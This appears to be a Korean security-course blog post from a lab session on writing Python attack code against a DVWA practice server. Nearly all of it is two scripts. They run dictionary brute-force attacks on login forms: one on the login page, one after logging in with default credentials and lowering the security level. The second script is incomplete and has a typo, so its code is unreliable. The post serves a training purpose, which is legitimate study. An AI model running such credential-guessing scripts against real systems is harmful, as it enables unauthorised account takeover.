정보보안 과정 Day120-1 : 파이썬 공격 코드 제작 실습

 

 

 

 

 

target = DVWA 서버

 

 

 

Bruteforce.py

import requests
from bs4 import BeautifulSoup
import re

# url : http://192.168.10.134/dvwa/login.php
# date : username=admin&password=1234&Login=Login
# proxies : http|https://127.0.0.1:9000
# FAIL_MESS : Login failed

# (1) dictionary file read + brute force attack
# (2) result

# (1) dictionary file read + brute force attack
userfile = 'username.txt'
passfile = 'password.txt'
login_url = 'http://192.168.10.134/dvwa/login.php'
FAIL_MESS = 'Login failed'

ufile = open(userfile)
# print(fd.read())
for user in ufile:
    # print(user)
    user = user.rstrip()
    # print(user)
    pfile = open(passfile)
    for passwd in pfile:
        passwd = passwd.rstrip()
        # print(user, passwd)
        login_data = {'username': user, 'password': passwd, 'Login': 'Login'}
        resp = requests.post(login_url, data=login_data)
        # print(resp.text) ; input()
        soup = BeautifulSoup(resp.text, 'lxml')
        # print(soup.find_all('div', {'class', 'message'})) ; input()
        content = soup.find_all('div', {'class', 'message'})
        if re.search(FAIL_MESS, str(content)):
            print('[ WARN ] %s : %s' % (user, passwd))
        else:
            print('[  OK  ] %s : %s' % (user, passwd))

# (2) result

 

 

 

 

bruteforce2.py

 

import requests
from bs4 import BeautifulSoup
import re
import sys

# 1) Login attempt
# 2) Security Level configuration
# 3) Brute Force Attack

# 1) Login attempt
# Method : POST
# url : http://192.168.10.134/dvwa/login.php
# data : username=admin&password=password&Login=Login
# ok_mess : Welcome to Damn Vulnerable Web App!
login_url = 'http://192.168.10.134/dvwa/login.php'
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_ok = 'Welcome to Damn Vulnerable Web App!'
proxies = {'http': 'http://localhost:9000', 'htts': 'https://localhost:9000'}

s = requests.Session()
resp = s.post(login_url, data=login_data, proxies=proxies)
# print(resp.text)
soup = BeautifulSoup(resp.text, 'lxml')
# print(soup.h1.string)
if re.search(login_ok, soup.h1.string):
    print('[  OK  ] Login success.')
else:
    print('[ WARN ] Login failed.')
    sys.exit(2)

# 2) Security Level configuration
# Method : POST
# url : http://192.168.10.134/dvwa/security.php
# data : security=low&seclev_submit=Submit
# ok_mess : 'Security level set to low'
security_url = 'http://192.168.10.134/dvwa/security.php'
security_data = {'security': 'low', 'seclev_submit': 'Submit'}
resp = s.post(security_url, data=security_data, proxies=proxies)
# print(resp.text)
soup = BeautifulSoup(resp.text, 'lxml')
# print(soup.find_all('div', {'class', 'message'}))
security_ok = 'Security level set to low'
if re.search(security_ok, str(soup.find_all('div', {'class', 'message'}))):
    print('[  OK  ] Security level set to low.')
else:
    print('[ WARN ] Security level is not set.')
    sys.exit(3)

# 3) Brute Force Attack
# file: username.txt, password.txt
# fail_mess: 'Username and/or password incorrect.'

# 3-1) dictionary file read && dictionary attack
# 3-2) result report

# 3-1) dictionary file read && dictionary attack
userfile = 'username.txt'
passfile = 'password.txt'
num = 0
ufile = open(userfile)
for user in ufile:
    user = user.rstrip()
    pfile = open(passfile)
    for passwd in pfile:
        num += 1
        passwd = passwd.rstrip()
        # print(num, user, passwd)

        # Method: GET
        # url:  /dvwa/vulnerabilities/brute/?
        # params: username=admin&password=1111&Login=Login
        # fail_mess: 'Username and/or password incorrect'
        brute_url = 'http://192.168.10.134/dvwa/vulnerabilities/brute/?'
        brute_params = {'username': user, 'password': passwd, 'Login': 'Login'}
        resp = s.get(brute_url, params=brute_params, proxies=proxies)
        # print(resp.text) ; input()
        soup = BeautifulSoup(resp.text, 'lxml')
        # print(soup.pre) ; input()

str(soup.script.pre)
# 3-2) result report